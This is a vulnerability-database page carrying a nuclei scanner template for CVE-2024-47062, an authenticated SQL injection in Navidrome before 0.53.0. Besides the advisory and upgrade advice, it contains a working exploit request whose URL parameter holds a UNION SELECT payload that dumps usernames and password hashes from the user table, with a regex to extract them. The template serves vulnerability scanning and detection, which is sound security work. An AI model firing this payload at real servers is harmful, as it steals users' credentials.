Lucene search
K

Navidrome < 0.53.0 - Authenticated SQL Injection

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Navidrome SQL Injection in < 0.53.

Related
Refs
Code
id: CVE-2024-47062

info:
  name: Navidrome < 0.53.0 - Authenticated SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.
  impact: |
    Authenticated attackers can exploit SQL injection to extract sensitive database information including encrypted passwords.
  remediation: |
    Update Navidrome to version 0.53.0 or later.
  reference:
    - https://github.com/advisories/GHSA-58vj-cv5w-v4v6
    - https://github.com/navidrome/navidrome/security/advisories/GHSA-58vj-cv5w-v4v6
    - https://nvd.nist.gov/vuln/detail/CVE-2024-47062
  classification:
    epss-score: 0.04457
    epss-percentile: 0.90293
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"content="Navidrome""
  tags: cve,cve2024,sqli,orm-leak,navidrome,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /auth/login HTTP/1.1
        Host: {{Hostname}}
        content-type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    extractors:
      - type: json
        name: auth_token
        internal: true
        part: body
        json:
          - '.token'

  - raw:
      - |
        GET /api/album?_end=36&_order=DESC&_sort=recently_added&_start=0&1+like+1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,(select+group_concat(concat(user_name,':',password))from+user),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--=123 HTTP/1.1
        Host: {{Hostname}}
        x-nd-authorization: Bearer {{auth_token}}

    extractors:
      - type: regex
        group: 1
        part: body
        regex:
          - 'sql/driver: couldn''t convert \\\"(.*?)\\\"'
# digest: 4b0a004830460221009550b05dfe4c35b57dc9b343fa4ae0e428b3b28b096933e1737ea5fb0b18d743022100f270ab27f5257479ce7a4791206a899bfb01bb47c24624fabc070b64ed4dcc57:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.18.8
CVSS 49.4
EPSS0.04457
SSVC
25